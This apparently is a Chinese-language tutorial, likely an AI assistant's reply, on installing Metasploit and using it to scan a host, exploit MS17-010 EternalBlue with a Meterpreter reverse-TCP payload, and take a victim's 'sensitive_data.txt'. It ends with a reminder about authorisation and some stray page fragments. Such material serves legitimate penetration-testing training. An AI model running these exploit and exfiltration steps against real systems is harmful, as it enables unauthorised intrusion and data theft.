安装 Metasploit
你可以使用 Metasploit 的安装脚本从 Rapid7 官方站点下载安装。
-
更新系统包:
sudo apt update -
下载并安装 Metasploit:
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfupdate chmod 755 msfupdate sudo ./msfupdate
使用 Metasploit
安装完成后,你可以通过以下步骤来使用 Metasploit。
-
启动 Metasploit 控制台:
msfconsole启动 Metasploit 控制台后,你会看到类似以下的提示符:
msf6 > -
基本命令
-
搜索漏洞和模块:
search <keyword>示例:
search apache -
选择一个模块:
use <module>示例:
use exploit/windows/smb/ms17_010_eternalblue -
查看模块信息:
info -
设置模块选项:
set <option> <value>示例:
set RHOSTS 192.168.1.10 set LHOST 192.168.1.20 -
运行模块:
run
-
-
扫描目标主机:
Metasploit 包含多个扫描器模块,例如
auxiliary/scanner/,你可以使用这些模块扫描目标主机的漏洞。-
使用端口扫描模块:
use auxiliary/scanner/portscan/tcp set RHOSTS 192.168.1.10 set THREADS 10 run -
使用漏洞扫描模块:
use auxiliary/scanner/http/http_version set RHOSTS 192.168.1.10 run
-
-
利用漏洞:
一旦发现漏洞,可以使用相应的利用模块进行攻击。
-
选择漏洞利用模块:
use exploit/windows/smb/ms17_010_eternalblue -
设置漏洞利用参数:
set RHOSTS 192.168.1.10 set LHOST 192.168.1.20 set PAYLOAD windows/x64/meterpreter/reverse_tcp -
运行漏洞利用:
exploit
成功利用后,你可能会获得目标系统的访问权限,并进入 Meterpreter 会话。
-
-
使用 Meterpreter:
Meterpreter 是 Metasploit 提供的一个强大的后渗透攻击工具。进入 Meterpreter 会话后,可以使用以下命令:
-
获取系统信息:
sysinfo -
获取权限:
getuid getprivs -
列出文件和目录:
ls -
下载文件:
download <remote_path> <local_path> -
上传文件:
upload <local_path> <remote_path> -
执行命令:
execute -f <command> -
关闭会话:
exit
-
示例
以下是一个使用 Metasploit 扫描和利用漏洞的完整示例:
-
启动 Metasploit 控制台:
msfconsole -
搜索并使用漏洞扫描模块:
search smb use auxiliary/scanner/smb/smb_version set RHOSTS 192.168.1.10 run -
发现漏洞后,选择漏洞利用模块:
use exploit/windows/smb/ms17_010_eternalblue set RHOSTS 192.168.1.10 set LHOST 192.168.1.20 set PAYLOAD windows/x64/meterpreter/reverse_tcp exploit -
进入 Meterpreter 会话并执行命令:
sysinfo ls download C:\\Users\\Admin\\Desktop\\sensitive_data.txt /tmp/sensitive_data.txt exit
通过这些步骤,你可以使用 Metasploit 进行漏洞扫描和利用,并执行后渗透攻击。请注意,使用 Metasploit 等工具进行渗透测试时,应获得目标系统的合法授权,以确保操作的合法性和道德性。如果你需要进一步的帮助或有其他问题,请告诉我。
)
)
五千字好文)
